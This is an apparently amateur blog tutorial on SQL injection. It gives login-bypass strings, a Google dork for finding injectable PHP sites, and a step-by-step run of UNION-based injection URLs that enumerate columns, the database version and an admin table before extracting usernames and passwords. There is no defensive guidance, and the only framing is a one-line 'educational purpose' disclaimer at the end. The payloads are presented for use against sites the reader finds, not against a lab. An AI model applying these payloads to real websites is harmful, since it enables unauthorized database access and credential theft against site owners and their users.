SQL Injection

SQL is Structured Query Language which consists of several commands used to retrieve data from database. SQL consists of commands, divided into –

  1. DDL (Data Definition Language)
  2. DML (Data Manipulation Language)
  3. TCL (Transaction Control Statements)
  4. DCL (Data Control Statements)

In these commands DDL and DML are the important and basic ones for beginners to learn.

You can get resources to these commands here –

SQL DDL, DML, DCL, TCL Commands

SQL Injection is the technique of inserting code into the Database in such a manner that data can be retrieved from the database but you don’t need to be a database admin or an authorized user. SQL Injection can be done in many ways, some of them I have explained here

The first way is to find a vulnerability in the login by inserting quotes and special injection strings mentioned below-

" or "1"="1   //Main Injection Strategy

This works as follows, a typical SQL query consists of this,

SELECT * FROM table_name WHERE username=” ” AND password=” “

If we fill this query with injection string it becomes,

SELECT * FROM table_name WHERE username=” ” or “1”=”1 ” AND password=” ” or “1”=”1 “

Thus this username and password becomes true and true leading to correct execution of the query and access to the database.

If the main injection strategy doesn’t work  it means there are filters to work with. A filter is nothing but a security system in place to protect from injection. For this,

  • admin' --
  • admin' #
  • admin'/*
  • ' or 1=1--
  • ' or 1=1#
  • ' or 1=1/*
  • ') or '1'='1--
  • ') or ('1'='1--

the above strings can be used if the main strategy doesn’t work. Also there is a second way to get the database using SQL COMMANDS for a PHP based websites.

To find the vulnerable websites we just have to use Google Dorks.

In the google dorks the dork that we use here are

inurl:index.php?id=

After using this dork the list of vulnerable websites come up and you can SQL inject those sites using the following –

Introducing The SQL Injection Vulnerabilites
Exploiting SQL Injection Vulnerabilities :

example website -- http://www.website.com/articles.php?id=3

ADD QUOTE AT THE ENDING OF URL

http://www.website.com/articles.php?id=3'

Now when this request is sent you will get an error 
located somewhere in the page.
Finding the number of columns:
ORDER BY is used for finding columns of database.
Add order by at end of URL along with number of columns (a random number)

http://www.website.com/articles.php?id=3 order by 1/*

If no error arises keep on changing the number until error is 
displayed.
http://www.website.com/articles.php?id=3 order by 2/*

http://www.website.com/articles.php?id=3 order by 3/*

http://www.website.com/articles.php?id=3 order by 4/*

http://www.website.com/articles.php?id=3 order by 5/*

Here if I get an error stating Unknown Column:5 then there are only 
four columns in the database.
Checking UNION function :
UNION is used to get more information about the website
http://www.website.com/articles.php?id=3 union all select 1,2,3,4/*

Here it is four columns only so we have extended till four,
if you got thirteen, then you have to give until 13.
union all select 1,2,3,4,5,6,7,8,9,10,11,12,13/*

Now, if we see some numbers in the page like 
1 or 2 or 3 or 4 == the UNION function works
if it not work we try to change the /* to --
So we have this,
http://www.website.com/articles.php?id=3 union all select 1,2,3,4--

Getting SQL Version :
Now we have a number in the screen after checking the UNION
we say in example that this number is 3 this is vulnerability area,
so all commands have to be injected using this 3 number
This is different number for different websites
Based on your website number is chosen.
so we replace 3 with @@version or version()

http://www.website.com/articles.php?id=3 union all select 1,2,@@version,4/*

and now we have the version in the screen!
Getting tables and columns names :
if the MySQL Version is < 5 (i.e 4.1.33, 4.1.12...)
admin table is checked.

http://www.website.com/articles.php?id=3 union all select 1,2,3,4 from admin/*

and here we see the number 3 that we had in the screen
now, we knows that the table admin exists
here we had to check column names:

http://www.website.com/articles.php?id=3 union all select 1,2,username,4,5 from admin/*

if we get an error we have to try another column name
and if it work we get username displayed on screen.
The thing is several websites have different column names so we have to 
check all the names one by one (example: admin,moderator,super moderator...)
after that we can check if column password exists we have this
http://www.website.com/articles.php?id=3 union all select 1,2,password,4,5 from admin/*

We get the password!!!
Mostly passwords are in different formats so we have to convert them to text
by using online converters.

Now we have to use 0x3a for having the information
like that username:password ,dmin:unhash...

http://www.website.com/articles.php?id=3 union all select 1,2,concat(username,0x3a,password),4,5 from admin/*


This is the sample SQL Injection.

There are other ways to do it but I find this the simple way. If you are fed up with the typing of the above commands you can use automated tools to perform SQL Injection.

One such tool is called as SQLMAP which is a very highly sophisticated automated tool to perform any kind of SQL Injection attack on a website.

You can download the tool here–

SQL MAP – Automating SQL Injection

LEGAL DISCLAIMER

The content in this site is for educational purpose only. The author and members of the site are not responsible for the actions of the viewers. It is illegal to hack websites without the consent of the website owner.

 

Leave a comment